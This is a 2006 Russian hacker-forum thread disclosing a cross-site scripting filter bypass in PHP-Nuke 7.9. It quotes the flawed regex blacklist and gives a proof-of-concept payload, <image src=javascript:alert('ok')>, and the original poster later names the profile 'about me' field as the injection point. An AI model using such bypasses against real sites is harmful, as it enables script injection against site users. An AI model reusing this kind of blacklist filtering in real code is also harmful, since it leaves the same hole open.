23.02.2006, 14:52
|
|
Новичок
Регистрация: 22.02.2006
Сообщений: 12
С нами:
10639733
Репутация:
3
|
|
баг в PHP-Nuke 7.9
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) { foreach ($_GET as $sec_key => $secvalue) { if ((eregi("<*script*\"?*>", $secvalue)) || (eregi("<*object*\"?*>", $secvalue)) || (eregi("<*iframe*\"?*>", $secvalue)) || (eregi("<*applet*\"?*>", $secvalue)) || (eregi("<*meta*\"?*>", $secvalue)) || (eregi("<*style*\"?*>", $secvalue)) || (eregi("<*form*\"?*>", $secvalue)) || (eregi("<*img*\"?*>", $secvalue)) || (eregi("<*onmouseover*\"?*>", $secvalue)) || (eregi("\(*\"?*\)", $secvalue)) || (eregi("\"", $secvalue)) || (eregi("forum_admin", $sec_key)) || (eregi("inside_mod", $sec_key))) {
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь |
|
|
24.02.2006, 00:32
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
С нами:
11133086
Репутация:
241
|
|
Сообщение от Dr0ne
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) { foreach ($_GET as $sec_key => $secvalue) { if ((eregi("<*script*\"?*>", $secvalue)) || (eregi("<*object*\"?*>", $secvalue)) || (eregi("<*iframe*\"?*>", $secvalue)) || (eregi("<*applet*\"?*>", $secvalue)) || (eregi("<*meta*\"?*>", $secvalue)) || (eregi("<*style*\"?*>", $secvalue)) || (eregi("<*form*\"?*>", $secvalue)) || (eregi("<*img*\"?*>", $secvalue)) || (eregi("<*onmouseover*\"?*>", $secvalue)) || (eregi("\(*\"?*\)", $secvalue)) || (eregi("\"", $secvalue)) || (eregi("forum_admin", $sec_key)) || (eregi("inside_mod", $sec_key))) {
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь RE конечно, но хотелось бы немного поподробнее....
|
|
|
|
24.02.2006, 02:02
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами:
10958786
Репутация:
1034
|
|
Мне тоже интересно стало.... раскажи подробней...
|
|
|
|
24.02.2006, 10:37
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами:
11200586
Репутация:
1398
|
|
А что тут подробней он ведь и так уже выложил уязвимость можно сказать.
|
|
|
|
24.02.2006, 13:36
|
Регистрация: 18.02.2006
Сообщений: 1,090
С нами:
10644806
Репутация:
1564
|
|
Прикольно, держи +
|
|
|
|
24.02.2006, 16:43
|
|
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
С нами:
11527586
Репутация:
662
|
|
вопрос только в том где вводить а?
|
|
|
|
24.02.2006, 17:05
|
|
Новичок
Регистрация: 22.02.2006
Сообщений: 12
С нами:
10639733
Репутация:
3
|
|
чтоб точно узнать пришлось денвер ставить)))
Ваш аккаунт - Персональная информация - Немного о себе:
=======================
кста я эту багу никому не показывал и никто о ней не знал
|
|
|
|
|
 |
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
PHP vs mod_rewrite
|
Trinux |
PHP |
11 |
13.05.2005 21:25 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
